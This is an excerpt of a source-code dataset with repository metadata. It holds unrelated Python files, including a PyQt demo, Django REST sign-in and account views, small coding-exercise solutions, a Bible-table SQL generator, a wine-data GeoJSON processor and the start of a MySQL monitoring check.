for i in self.items:
if isinstance(i, tuple):
fullname, icon_path, user_data = i[0], i[1], i[2]
text = fullname
self.combo.addItem(QtGui.QIcon(icon_path), text, user_data)
else:
self.combo.addItem(i)
print self.combo.itemData(0)
print self.combo.itemData(1)
print self.combo.itemData(2)
def _combo_currentIndexChanged(self, idx):
activated_idx = idx
if idx == -1:
return
item = self.items[idx]
if not item:
return
text, icon_path, user_data = item[0], item[1], item[2]
matched_idx = self.combo.findData(user_data)
assert activated_idx == matched_idx
print
print "text:", text
print "icon path:", icon_path
print "user_data:", user_data
def show_and_raise(self):
self.show()
self.raise_()
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
demo = Demo()
demo.show_and_raise()
sys.exit(app.exec_())
| [
"shuge.lee@gmail.com"
] | shuge.lee@gmail.com |
a468fe60624b32c4061bf9e37b5a43a921d6156d | 5f89a6a1419022f3566bb326915b1da6ce4e5ad4 | /API/views/views.py | 90d4669e7e510b0c2f5779bec71e74c7b844c726 | [] | no_license | maintain0404/RelolerApi | 1377b7a125ab7e352eb461251e91616516a9f340 | b269c48c3fe4b10262fc426fbc12bb9f4df3cdc2 | refs/heads/master | 2022-12-25T13:48:50.329360 | 2020-10-11T07:38:10 | 2020-10-11T07:38:10 | 279,353,841 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,446 | py | from rest_framework.decorators import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework.parsers import JSONParser
from dynamodb_wrapper.base import DataAlreadyExistsError
from dynamodb_wrapper import User
from google_api_wrapper import oauth
import json
from drf_yasg import openapi
from drf_yasg.utils import swagger_auto_schema
from .riot_auth import get_riot_id, set_random_icon, get_riot_id_icon
import background
from google_api_wrapper import drive
# Create your views here.
# class PostView(APIView):
# def get(self, request, pk, sk):
# db = Post(pk, sk).read()
# if db:
# return Response(db, status = status.HTTP_200_OK)
# else:
# return Response(status = status.HTTP_404_NOT_FOUND)
# def patch(self, request, pk, sk):
# res = json.loads(request.body)
# db = Post(pk, sk)
# if db.update(res.get('PostTitle'),res.get('PostContent')):
# return Response(status = status.HTTP_202_ACCEPTED)
# else:
# return Response(status = status.HTTP_406_NOT_ACCEPTABLE)
# def post(self, request, pk = None, sk = None):
# return Response(status = status.HTTP_405_METHOD_NOT_ALLOWED)
# def delete(self, request, pk, sk):
# if Post(pk, sk).delete():
# return Response(status.HTTP_202_ACCEPTED)
# else:
# return Response(status = status.HTTP_406_NOT_ACCEPTABLE)
# class PostListView(APIView):
# def get(self, request):
# try:
# db = Posts()
# db.add_attributes_to_get('pk','sk','PostData.PostTitle','PostData.Nickname')
# except:
# return Response(status = status.HTTP_404_NOT_FOUND)
# else:
# return Response(db.go()['Items'], status = status.HTTP_200_OK)
# def post(self, request):
# res = json.loads(request.body)
# print(res)
# try:
# Post('testpk0', 'hi').create(res)
# except Exception:
# return Response(status = status.HTTP_400_BAD_REQUEST)
# else:
# return Response(status = status.HTTP_201_CREATED)
# def put(self, request):
# return Response(status = status.HTTP_405_METHOD_NOT_ALLOWED)
# def delete(self, request):
# return Response(status = status.HTTP_405_METHOD_NOT_ALLOWED)
# class CommentListView(APIView):
# def get(self, request, pk, sk = None):
# db = CommentList(pk).go()
# if db:
# return Response(db, status = status.HTTP_200_OK)
# else:
# return Response(status.HTTP_404_NOT_FOUND)
# def put(self, request, pk, sk = None):
# return Response(status = status.HTTP_501_NOT_IMPLEMENTED)
# def patch(self, request, pk, sk):
# return Response(status = status.HTTP_501_NOT_IMPLEMENTED)
# def delete(self, reqeust, pk, sk):
# return Response(status.HTTP_501_NOT_IMPLEMENTED)
# class UserInfoView(APIView):
# def get(self, request):
# if request.session['user_sk']:
# try:
# db_request = User(request.session['user_sk'], 'read')
# db_request.add_attributes_to_get('User','ClosedUserData')
# db_result = db_request.read()
# if db_result:
# return Response(db_result, status = status.HTTP_200_OK)
# else:
# return Response(status = status.HTTP_404_NOT_FOUND)
# except Exception as err:
# print(err)
# return Response(status = status.HTTP_400_BAD_REQUEST)
# else:
# return Response(status = status.HTTP_404_NOT_FOUND)
class RiotIDAuthView(APIView):
'''
계정의 라이엇 ID 정보
로그인이 필요함
'''
parser_classes = (JSONParser,)
post_schema = openapi.Schema(
properties = {'name' : openapi.Schema(
type = openapi.TYPE_STRING,
description = '라이엇 계정 닉네임'
)},
type = openapi.TYPE_OBJECT
)
param_name_hint = openapi.Parameter(
'name',
openapi.IN_BODY,
description = '라이엇 닉네임',
type = openapi.TYPE_STRING,
)
@swagger_auto_schema(
operation_id = "User_RiotID_LIST",
operation_description = "계정에 연결된 라이엇 계정 조회",
responses = {
200 : "조회 성공",
400 : "조회 실패",
401 : "로그인 상태가 아님"
}
)
def get(self, request):
try:
print(request.session.items())
final_res = {}
if request.session.get('user_sk'):
res = User.read(
pk = 'User',
sk = request.session['user_sk'],
attributes_to_get = [
'ClosedUserData'
]
).execute()
final_res = res['ClosedUserData']['RiotID']
for idx, v in enumerate(final_res):
if not v['Authenticated'] and v['IconID'] == get_riot_id_icon(v['Name']):
User.update(
pk = 'USER',
sk = request.session['user_sk'],
expressions = [{
'utype' : 'SET',
'path' : f'ClolsedUserData.RiotID[{idx}].Authenticated',
'value' : True
}]
).execute()
final_res['ClosedUserData']['RiotID'][idx]['Authenticated'] = True
else:
return Response(status = status.HTTP_401_UNAUTHORIZED)
except Exception as err:
print(err)
return Response(status = status.HTTP_400_BAD_REQUEST)
else:
return Response(final_res, status = status.HTTP_200_OK)
@swagger_auto_schema(
request_body = post_schema,
operation_id = "USER_RiotID_ADD",
operation_description = "계정에 라이엇 아이디 추가",
responses = {
200 : "계정에 새 라이엇 아이디 연결 성공",
400 : "계정에 새 라이엇 아이디 연결 실패"
}
)
def post(self, request):
try:
res = json.loads(request.body)
riot_id = get_riot_id(res['name'])
print(riot_id)
riot_id_dict = dict()
if riot_id:
riot_id_dict['Name'] = riot_id['name']
riot_id_dict['PUUID'] = riot_id['puuid']
riot_id_dict['IconID'] = set_random_icon(riot_id)
riot_id_dict['Authenticated'] = False
else:
return Response(status = status.HTTP_400_BAD_REQUEST)
User.update(
pk = 'USER',
sk = request.session['user_sk'],
expressions = [{
'utype' : 'LIST_APPEND',
'path' : 'ClosedUserData.RiotID',
'value' : riot_id_dict
}]
).execute()
except json.JSONDecodeError as err:
print(err)
return Response(status = status.HTTP_400_BAD_REQUEST)
except KeyError as err:
print(err)
return Response(status = status.HTTP_400_BAD_REQUEST)
except Exception as err:
return Response(status = status.HTTP_501_NOT_IMPLEMENTED)
else:
return Response(status = status.HTTP_200_OK)
@swagger_auto_schema(
request_body = post_schema,
operation_id = 'User_RiotID_DELETE',
operation_description = "계정에 연결된 라이엇 아이디 연결 해제",
responses = {
200 : "연결 해제 성공",
400 : "연결 해제 실패"
}
)
def delete(self, request):
try:
idx = str(request.GET.get('riot_id_index'))
User.update(
pk = 'USER',
sk = request.session['user_sk'],
expressions = [{
'utype' : 'REMOVE',
'path' : f'ClosedUserData.RiotID[{idx}]',
}]
).execute()
except Exception as err:
print(err)
return Response(status = status.HTTP_400_BAD_REQUEST)
else:
return Response(status = status.HTTP_200_OK)
class SignOutView(APIView):
'''
모든 로그인 세션 삭제
'''
@swagger_auto_schema(
operation_id = 'Signout',
responses = {
200 : '세션 삭제 성공',
400 : '세션 삭제 실패'
}
)
def get(self, request):
try:
request.session.flush()
except Exception as err:
print(err)
return Response(status = status.HTTP_404_NOT_FOUND)
else:
return Response(status = status.HTTP_200_OK)
class UuidSignInView(APIView):
'''
UUID를 통한 로그인
'''
param_uuid_hint = openapi.Parameter(
'uuid',
openapi.IN_QUERY,
description = 'android uuid',
type = openapi.TYPE_STRING
)
@swagger_auto_schema(
operation_id = "SignIn_UUID",
operation_description = "UUID를 통해 계정에 로그인",
manual_parameters=[param_uuid_hint],
responses = {
200 : "로그인 성공",
400 : "로그인 실패"
}
)
def get(self, request, uuid):
user_info = User.read(
pk = 'USER', sk = uuid
)
if user_info is None:
User.create(
data = {
'pk' : 'USER',
'sk' : f'uuid#{uuid}',
'User' : 'nickname',
'ClosedUserData' : {
'UserEmail' : '',
'UserName' : '',
'UserLocale' : '',
'RiotID' : []
}},
overwrite = False
).execute()
request.session['user_sk'] = f'uuid#{uuid}'
return Response(status = status.HTTP_200_OK)
class GoogleSignInUriView(APIView):
'''
구글 Oauth 로그인 페이지 URI를 반환
'''
param_redirect_uri_hint = openapi.Parameter(
'redirect_uri',
openapi.IN_QUERY,
description = '로그인 과정이 끝난 후 리다이렉트될 uri',
type = openapi.TYPE_STRING
)
response_redirect_uri = openapi.Schema(
type = openapi.TYPE_OBJECT,
propreties = {
'google_openid_uri' : openapi.Schema(
type = openapi.TYPE_STRING,
description = "구글 로그인 URI"
)
},
required = ['google_openid_uri']
)
@swagger_auto_schema(
operation_id = "SignIn_Google_URI",
operation_description = "구글 로그인 페이지 URI",
manual_parameters=[param_redirect_uri_hint],
responses = {
200 : response_redirect_uri,
400 : 'URI 받아오기 실패'
}
)
def get(self, request):
result = {}
result['google_openid_uri'] = oauth.authorization_url
return Response(result, status = status.HTTP_200_OK)
# google oauth 웹용으로 쓰던 것
class GoogleSignInView(APIView):
'''
구글 Oauth 로그인
UUID를 통해 로그인 되어 있다면 UUID 로그인 정보가 구글로그인으로 교체되고
더 이상 해당 UUID 로그인은 불가능해짐
아무런 파라미터가 없을 경우 구글 로그인 url을 제공함.
'''
param_google_token_hint = openapi.Parameter(
'google_token',
openapi.IN_QUERY,
description = 'google oauth 액세스 토큰',
type = openapi.TYPE_STRING
)
@swagger_auto_schema(
operation_id = 'SignIn_Google',
operation_description = "토큰 방식 및 코드 방식의 구글 Oauth 로그인 처리",
manual_parameters=[param_google_token_hint],
responses = {
200 : "구글 로그인 성공",
401 : "유효하지 않은 토큰 혹은 코드"
})
def get(self, request):
idinfo = {}
result = {}
# get google token and idinfo
try:
if request.GET.get('google_token'):
idinfo = oauth.verify_id_token(request.GET.get('google_token'))
elif request.GET.get('state'):
idinfo = oauth.get_info_from_uri(request.build_absolute_uri())
else:
result['google_openid_url'] = oauth.authorization_url
return Response(result, status = status.HTTP_200_OK)
except oauth.InvalidTokenError as err:
return Response(status = status.HTTP_401_UNAUTHORIZED)
# read whether data exists or not
user_info = None
user_info = User.read(
pk = 'USER', sk = f"google#{idinfo['sub']}",
).execute()
if user_info is None and request.GET.get('uuid'):
user_info = User.read(
pk = 'USER', sk = f"uuid#{request.GET['uuid']}",
).execute()
# create data if not exists
if user_info is None:
User.create(
data = {
'pk' : 'USER',
'sk' : f'google#{idinfo["sub"]}',
'User' : '',
'ClosedUserData' : {
'UserEmail' : idinfo['email'] if idinfo.get('email') else '',
'UserName' : idinfo['name'],
'UserLocale' : idinfo['locale'],
'RiotID' : []
}},
overwrite = False
).execute()
# change uuid search key to google search key
elif 'uuid' in user_info['sk']:
User.update(
pk = 'USER', sk = user_info['sk'],
expressions = [{
'utype' : 'SET', 'path' : 'sk', 'value' : f"google#{idinfo['sub']}",
'overwrite' : True
}]
)
request.session['user_sk'] = f"google#{idinfo['sub']}"
request.session['google_access_token'] = idinfo['access_token']
return Response(result, status = status.HTTP_200_OK)
class UserInfoView(APIView):
userinfo_schema = openapi.Schema(
type = openapi.TYPE_OBJECT,
propreties = {
'nickname' : openapi.Schema(
type = openapi.TYPE_STRING,
description = "사용할 닉네임"
)
},
required = ['nickname']
)
@swagger_auto_schema(
operation_id = 'UserInfo_GET',
operation_description = "유저 정보 확인하기, 자신의 계정이라면 추가로 정보가 보임",
responses = {
200 : "구글 로그인 성공",
404 : "존재하지 않는 유저 혹은 기타 에러"
})
def get(self, request, logintype, userid, *args, **kargs):
atbt2get = ['User']
print(userid)
if request.session['user_sk'] == f'{logintype}#{userid}':
atbt2get.append('ClosedUserData')
try:
res = User.read(
pk = 'USER',
sk = f'{logintype}#{userid}',
attributes_to_get = atbt2get
).execute()
except Exception as err:
print(err)
return Response(status = status.HTTP_404_NOT_FOUND)
else:
return Response(res, status = status.HTTP_200_OK)
@swagger_auto_schema(
request_body = userinfo_schema,
operation_id = 'UserInfo_PUT',
operation_description = "토큰 방식 및 코드 방식의 구글 Oauth 로그인 처리",
responses = {
200 : "구글 로그인 성공",
401 : "자신이 아닌 다른 유저 정보에 접근",
404 : "존재하지 않는 유저 혹은 기타 에러"
})
def put(self, request, userid, *args, **kargs):
if request.session['user_sk'] != userid:
return Response(status = status.HTTP_401_UNAUTHORIZED)
if request.POST.get('nickname'):
try:
User.update(
pk = 'USER',
sk = userid,
expressions = [{
'utype' : 'SET',
'path' : 'User',
'nickname': request.POST.get('nickname'),
'overwrite': True
}
]
)
except Exception as err:
print(err)
return Response(status = status.HTTP_400_BAD_REQUEST)
else:
return Response(status = status.HTTP_200_OK)
else:
return Response(status = status.HTTP_400_BAD_REQUEST)
class GoogleDriveView(APIView):
@swagger_auto_schema(
operation_id = 'GoogleDrive_List',
operation_description = "구글 드라이브 내의 Reloler 영상 조회",
responses = {
200 : "조회 성공",
400 : "조회 실패"
})
def get(self, request):
response = Response()
try:
video_list = drive.Drive(request.sessions['google_access_token']).list()
response.data = video_list
response.status = status.HTTP_200_OK
return response
except Exception:
response.status = status.HTTP_404_NOT_FOUND
return response
| [
"maintain0404@gmail.com"
] | maintain0404@gmail.com |
84f66a0bf9e3af5d28f84b3115109b132927b474 | d66818f4b951943553826a5f64413e90120e1fae | /hackerearth/Algorithms/Chandu and chandni's secret chat/solution.py | 5347d87bca861f96880c7fd9b656c67c7b40092f | [
"MIT"
] | permissive | HBinhCT/Q-project | 0f80cd15c9945c43e2e17072416ddb6e4745e7fa | 19923cbaa3c83c670527899ece5c3ad31bcebe65 | refs/heads/master | 2023-08-30T08:59:16.006567 | 2023-08-29T15:30:21 | 2023-08-29T15:30:21 | 247,630,603 | 8 | 1 | MIT | 2020-07-22T01:20:23 | 2020-03-16T06:48:02 | Python | UTF-8 | Python | false | false | 605 | py | """
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
t = int(input())
for _ in range(t):
s, k = input().strip().split()
k = int(k)
idxes = list(range(len(s)))
idxes.sort(key=lambda i: s[i], reverse=True)
idx = idxes[k - 1]
word = ''
for _ in range(len(s)):
word += s[idx]
idx = idxes[idx]
word = word[-1] + word[:-1]
print(word)
| [
"hbinhct@gmail.com"
] | hbinhct@gmail.com |
b5854b8c41c172ede9cd5c98028caf21c9168d24 | 6e96feb90eebfb717a13b6704fff801e2a5505cc | /26-Remove-Duplicates-from-Sorted-Array/removeDuplicate.py | bc52c3327f6a777a0c41535a384ea898ec420110 | [] | no_license | chriszeng8/LeetCode | af6e0864efec61a9eb02a031dbc9b5d744e2e086 | 06b6ff3492e4df0521b0ea7eca17c9d270723e97 | refs/heads/master | 2020-05-22T01:17:34.011002 | 2017-03-24T02:49:50 | 2017-03-24T02:49:50 | 61,896,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | class Solution(object):
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
num_len = len(nums)
if num_len<=1:
return(num_len)
# store the largest num
largest_num = nums[0]
counter = 1
for i in range(1,num_len):
if nums[i]>largest_num:
largest_num = nums[i]
nums[counter] = nums[i]
counter = counter + 1
# nums = nums[:counter]
print nums
return counter
nums = [10,10,20,20,30]
print Solution().removeDuplicates(nums) | [
"chriszeng8@hotmail.com"
] | chriszeng8@hotmail.com |
1d7e55b823dfc9a936cd03ef7140b1adb134ea2b | 73a86edc84cb804bc522053c88b2a997c00f6e13 | /function.py | 904eac1fcf8ab284a0324378ad9e6cd903b0e0d4 | [] | no_license | aarthymurugappan101/python | 3b1fafad4db7a49d0f742934b8d958838b310ed9 | 2459241c2fb4f92f797ea45f5e931f3f8e174dc6 | refs/heads/master | 2020-06-25T00:50:53.904242 | 2019-08-12T11:21:08 | 2019-08-12T11:21:08 | 199,145,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | # def getInput():
# rank= int(input("plesse enter your rank"))
# return rank
# def printPrize(rank):
# if rank == 1:
# prize = "1000"
# elif rank == 2:
# prize = "800"
# elif rank == 3:
# prize = "700"
# elif rank ==4:
# prize = "300"
# elif rank == 5:
# prize = "300"
# else:
# prize = "20"
# print("your prize money is"+str(prize))
# r=getInput()
# printPrize(r)
def getInput():
farenhiet = float(input("please enter the farenhiet value"))
return farenhiet
def convertCelcius(farenhiet):
celcius = 5/9*(farenhiet-32)
print(round(celcius,2))
i=getInput()
convertCelcius(i) | [
"noreply@github.com"
] | noreply@github.com |
9d847003b12e4878b7bf1d7a2f45e57b2e4e8a05 | 6142db5163ca0187585ecb9cba1f41b75aa9f272 | /messenger/GUI.py | 08646663c7c7f3b6aa5ec623dc7144cdf9605389 | [] | no_license | Zily88/git-repo | 429cc72c79a5f326e450ccf20e41131885b152fe | d40539293141fda8bf6222e726af98dd8e3f2eb7 | refs/heads/master | 2020-03-07T01:48:17.816487 | 2018-05-09T16:29:19 | 2018-05-09T16:29:19 | 127,193,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | from PyQt5 import QtWidgets
from MainWindow import Ui_Form
from NotMainWindow import Ui_Form2
class MainWindow(QtWidgets.QWidget):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.ui = Ui_Form()
self.ui.setupUi(self)
class NotMainWindow(QtWidgets.QDialog):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.ui = Ui_Form2()
self.ui.setupUi(self)
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_()) | [
"nesterov_vladimir@rambler.ru"
] | nesterov_vladimir@rambler.ru |
47509e13562fec04be941d6672debdb3a56e8a8c | db4a874b1d7b44a1c190e95816d9ca38a705465b | /manage.py | b69bd7197c8e221ce07fb061e1de7eef303a2376 | [] | no_license | aborgesrodrigues/portfolio_performance | 964cf4b957e363f5f6c9e47f4c627b758a0cb847 | 3c6e8c96fa5d08cb7576986719d18726a8badd89 | refs/heads/master | 2023-08-30T08:05:14.579012 | 2023-08-29T23:07:54 | 2023-08-29T23:07:54 | 231,388,300 | 0 | 0 | null | 2022-11-08T19:22:39 | 2020-01-02T13:32:53 | Python | UTF-8 | Python | false | false | 641 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'portfolio_performance.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"alessandro.rodrigues@ifto.edu.br"
] | alessandro.rodrigues@ifto.edu.br |
b2b80179d0f8ddc7a76ed005cbc3670219bb8091 | 28f0dc2b48ed019dfef08d84e842c5d75e116dfc | /Versions/Release.2.x.x/py/OBSOLETE/BibleTable.py | cced9d9f98a8cb768a4c415715efb06a18c3eb2b | [
"MIT",
"LicenseRef-scancode-public-domain"
] | permissive | garygriswold/SafeBible | 9da0e8d89cb08888b8cf48773b4b3860086c49f7 | 2d378e84cbd6b81641bcccd6ba66699d24208548 | refs/heads/master | 2022-02-25T19:41:10.367183 | 2019-08-22T03:35:02 | 2019-08-22T03:35:02 | 34,028,119 | 0 | 0 | MIT | 2019-10-30T07:11:44 | 2015-04-16T01:40:19 | TSQL | UTF-8 | Python | false | false | 3,942 | py | #
# This program generates SQL statements to create and populate the Bible table
# This was previously called the Version table
#
import io
import os
import json
out = io.open("sql/bible.sql", mode="w", encoding="utf-8")
out.write(u"DROP TABLE IF EXISTS Bible;\n")
out.write(u"CREATE TABLE Bible (\n")
out.write(u" bibleId TEXT NOT NULL PRIMARY KEY,\n") # info.json filename[5:18]
out.write(u" code TEXT NOT NULL,\n") # info.json abbr
out.write(u" abbr TEXT NOT NULL,\n") # info.json abbr char 4-6
out.write(u" iso3 TEXT NOT NULL REFERENCES Language(iso3),\n") # info.json lang
out.write(u" name TEXT NOT NULL,\n") # info.json name
out.write(u" englishName TEXT NULL,\n") # info.json nameEnglish
out.write(u" localizedName TEXT NULL,\n") # Google Translate API
out.write(u" direction TEXT CHECK (direction IN('ltr','rtl')) default('ltr'),\n") # info.json dir
out.write(u" script TEXT NULL,\n") # info.json script
out.write(u" country TEXT NULL REFERENCES Country(code),\n") # info.json countryCode
out.write(u" s3Bucket TEXT NOT NULL,\n") # this program
out.write(u" s3KeyPrefix TEXT NOT NULL,\n") # info.json filename
out.write(u" s3Key TEXT NULL,\n") # %I_%O_%B_%C.html
# I cannot find program, which generated this template: s3KeyTemplate.py
out.write(u" s3CredentialId TEXT NULL,\n") # TBD
out.write(u" otDamId TEXT NULL,\n") # BibleUpdateDamId.py
out.write(u" ntDamId TEXT NULL,\n") # BibleUpdateDamId.py
out.write(u" stylesheet TEXT NOT NULL);\n") # constant stylesheet
prefix2 = "INSERT INTO Bible (bibleId, code, abbr, iso3, name, englishName, direction, script, country, s3Bucket, s3KeyPrefix, s3Key, stylesheet) VALUES"
stylesheet = "BibleApp2.css"
# read and process all info.json files
source = "/Users/garygriswold/ShortSands/DBL/FCBH_info/"
filelist = sorted(os.listdir(source))
for filename in filelist:
#if len(filename) != 28:
#print(len(filename), filename)
#else:
if len(filename) == 28:
#print(filename)
input2 = io.open(source + filename, mode="r", encoding="utf-8")
data = input2.read()
bible = json.loads(data)
bibleId = filename[5:18]
# check type to see if == bible
bType = bible['type']
if bType != 'bible':
print "?? Type = ", bType
# check abbr to see if different from bibleId
code = bible['abbr']
# remove lang code from abbr
abbr = code[3:]
# check that lang == first 3 letters of bibleId
iso3 = bible['lang']
if iso3.upper() != code[0:3]:
print "?? abbr=", code, " iso3=", iso3
iso3 = iso3.lower()
name = bible['name'].replace("'", "''")
englishName = bible['nameEnglish'].replace("'", "''")
direction = bible['dir']
# convert script to iso 15924 code
script = bible.get('script')
validScripts = [None, 'Arab', 'Beng', 'Bugi', 'Cans', 'Cyrl', 'Deva', 'Ethi', 'Geor',
'Hans', 'Hant', 'Java', 'Kore', 'Latn', 'Orya', 'Syrc', 'Taml', 'Thai' ]
#if validScripts.index(script) < 0:
if script in validScripts:
a = 1
else:
if script == 'Latin':
script = 'Latn'
elif script == 'Cyrillic':
script = 'Cyrl'
elif script == 'Arabic':
script = 'Arab'
elif script == 'Devangari':
script = 'Deva'
elif script == 'Devanagari (Nagari)':
script = 'Deva'
elif script == 'CJK':
script = None
else:
print "ERROR: unknown script code", script, filename
script = "'" + script + "'" if script != None else 'null'
country = bible.get('countryCode')
country = "'" + country.upper() + "'" if len(country) > 0 else 'null'
bucket = "dbp-prod"
keyPrefix = filename.replace("info.json", "").replace(":", "/")
s3Key = '%I_%O_%B_%C.html'
out.write("%s ('%s', '%s', '%s', '%s', '%s', '%s', '%s', %s, %s, '%s', '%s', '%s', '%s');\n" %
(prefix2, bibleId, code, abbr, iso3, name, englishName, direction, script, country, bucket, keyPrefix, s3Key, stylesheet))
out.close() | [
"gary@shortsands.com"
] | gary@shortsands.com |
686ec78309a16db8d1ce51f1a85347b62c062ac3 | 4016e9c2e766c012c760de375291cb33343e6048 | /Chapter_2/LightSwitch_Procedural.py | 88c28d142863f6ec8fc081e323fc88d87b2e03f7 | [
"BSD-2-Clause"
] | permissive | kapil87/Object-Oriented-Python-Code | 07d1609dc423b0d2ac8b0a1a86f57872b4fbf1ae | bd84b83896af0638131e95a014c29fe2e3a539b3 | refs/heads/master | 2023-07-31T20:22:40.222946 | 2021-09-10T17:45:13 | 2021-09-10T17:45:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | # Procedural light switch
def turnOn():
global switchIsOn
# turn the light on
switchIsOn = True
def turnOff():
global switchIsOn
# turn the light off
switchIsOn = False
# Main code
switchIsOn = False # a global Boolean variable
# Test code
print(switchIsOn)
turnOn()
print(switchIsOn)
turnOff()
print(switchIsOn)
turnOn()
print(switchIsOn)
| [
"Irv@furrypants.com"
] | Irv@furrypants.com |
227e887bea8fa47ad4def803c70e5cda59efe61b | 02f309da1333b018d466a6469199accd669e42f5 | /store/carts/templatetags/cart_extras.py | 2e1c859ebcaeefe7cadf109df70be07bb77c214d | [] | no_license | JesusGalindoB/django_project | 0dbfb3d802e847bb1f70d7aee4e34a75bce53391 | 29e047775d768ef8ec7ec16aa6f55ad5285d8667 | refs/heads/master | 2022-03-27T02:59:38.693824 | 2019-12-18T15:20:40 | 2019-12-18T15:20:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | from django import template
register = template.Library()
@register.filter()
def quantity_product_format(quantity=1):
return '{} {}'.format(quantity, 'products' if quantity > 1 else 'product')
@register.filter()
def quantity_add_format(quantity=1):
return '{} {}'.format(
quantity_product_format(quantity),
'aggregates' if quantity > 1 else 'aggregate'
)
| [
"jesbaga.17@gmail.com"
] | jesbaga.17@gmail.com |
8ef52ef102fe8b559bb374bf61e3765469efe340 | b08beebea7902f30518e115a1574f803bcde102a | /final_project/Q2_visualization/data_processing/dataProcessor.py | 95c775531e7d181566466a38357d5c2ead0f90ea | [] | no_license | niloofarmansoor/DataModelingAssignments | ffb48b2df216ce7c10706f3fbcca6e3d7317d55c | 8a30d82b4df29fcbe7c4aef32aec1f1ba1536d33 | refs/heads/main | 2023-04-08T00:36:50.716920 | 2021-04-09T20:10:45 | 2021-04-09T20:10:45 | 356,383,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,541 | py | #!/usr/bin/python
import json
import csv
import geojson
import tempfile
def removeDuplicate(array):
seen = set()
result = []
for item in array:
if item not in seen:
seen.add(item)
result.append(item)
return result
def getDataForCountry(country_name):
# Open the CSV file
with open('../data/wine-data.csv', 'r') as csv_data_file:
wine_data = csv.reader(csv_data_file, delimiter=',', quotechar='"')
num_of_diff_wine = 0
# 80-84 poor wine
poor = 0
# 84-88 fair wine
fair = 0
# 88-92 good wine
good = 0
# 92-96 very good wine
very_good = 0
# 96-100 excellent wine
excellent = 0
producers_list = []
for row in wine_data:
if row[1] == country_name:
num_of_diff_wine += 1
#print row[10].decode('string_escape')
producers_list.append(row[10].decode('string_escape'))
# find the classification of the wine
if 80 <= int(row[4]) < 84:
poor += 1
if 84 <= int(row[4]) < 88:
fair += 1
if 88 <= int(row[4]) < 92:
good += 1
if 92 <= int(row[4]) < 96:
very_good += 1
if 96 <= int(row[4]) <= 100:
excellent += 1
producers = removeDuplicate(producers_list)
# Create json object
result = {'name': country_name, 'num_of_wines': num_of_diff_wine, 'poor_wine': poor, 'fair_wine': fair, 'good_wine': good,
'veryGood_wine': very_good, 'excellent_wine': excellent, 'producers': producers}
return result
def main():
with open('../data/world-countries.geojson') as geojson_data_file:
data = geojson.load(geojson_data_file)
objects = data['features']
i = 0
for obj in objects:
try:
country_name = obj['properties']['name']
if country_name == 'United States of America':
country_name = 'US'
country_data = getDataForCountry(country_name)
obj['properties'] = country_data
except Exception as error:
print('Error happened: ', error)
output_filename = 'outputFile.geojson'
with open(output_filename, 'wb') as output_file:
# output_file.write('{\n"type": "FeatureCollection",')
json.dump(data, output_file, indent=2)
if __name__ == '__main__':
main() | [
"niloofar@huskers.unl.edu"
] | niloofar@huskers.unl.edu |
ac6dfffda8359a168fb10d8fe398e4f8efbbc4ac | e38499956d46f771a143c9faa1492d17a3fb5854 | /mysql/stackstate_checks/mysql/mysql.py | ee3f1e0c47b718b38ab868b96a93161e02d919cb | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | StackVista/stackstate-agent-integrations | 959f83bc76d00c407f90f438032d03d4c072bc5d | 350cb6e239157b50b5943cdf5ca13163da9b9307 | refs/heads/master | 2023-07-20T03:51:47.814264 | 2023-07-11T09:13:28 | 2023-07-11T09:13:28 | 195,226,626 | 3 | 9 | BSD-3-Clause | 2023-08-29T08:10:51 | 2019-07-04T11:10:24 | Python | UTF-8 | Python | false | false | 70,607 | py | # (C) Datadog, Inc. 2018
# (C) Datadog, Inc. Patrick Galbraith <patg@patg.net> 2013
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
from __future__ import division
import re
import traceback
from collections import defaultdict
from contextlib import closing, contextmanager
import pymysql
from six import PY3, iteritems, itervalues, text_type
try:
import psutil
PSUTIL_AVAILABLE = True
except ImportError:
PSUTIL_AVAILABLE = False
from stackstate_checks.base import AgentCheck, is_affirmative, TopologyInstance
if PY3:
long = int
GAUGE = "gauge"
RATE = "rate"
COUNT = "count"
MONOTONIC = "monotonic_count"
PROC_NAME = 'mysqld'
# Vars found in "SHOW STATUS;"
STATUS_VARS = {
# Command Metrics
'Slow_queries': ('mysql.performance.slow_queries', RATE),
'Questions': ('mysql.performance.questions', RATE),
'Queries': ('mysql.performance.queries', RATE),
'Com_select': ('mysql.performance.com_select', RATE),
'Com_insert': ('mysql.performance.com_insert', RATE),
'Com_update': ('mysql.performance.com_update', RATE),
'Com_delete': ('mysql.performance.com_delete', RATE),
'Com_replace': ('mysql.performance.com_replace', RATE),
'Com_load': ('mysql.performance.com_load', RATE),
'Com_insert_select': ('mysql.performance.com_insert_select', RATE),
'Com_update_multi': ('mysql.performance.com_update_multi', RATE),
'Com_delete_multi': ('mysql.performance.com_delete_multi', RATE),
'Com_replace_select': ('mysql.performance.com_replace_select', RATE),
# Connection Metrics
'Connections': ('mysql.net.connections', RATE),
'Max_used_connections': ('mysql.net.max_connections', GAUGE),
'Aborted_clients': ('mysql.net.aborted_clients', RATE),
'Aborted_connects': ('mysql.net.aborted_connects', RATE),
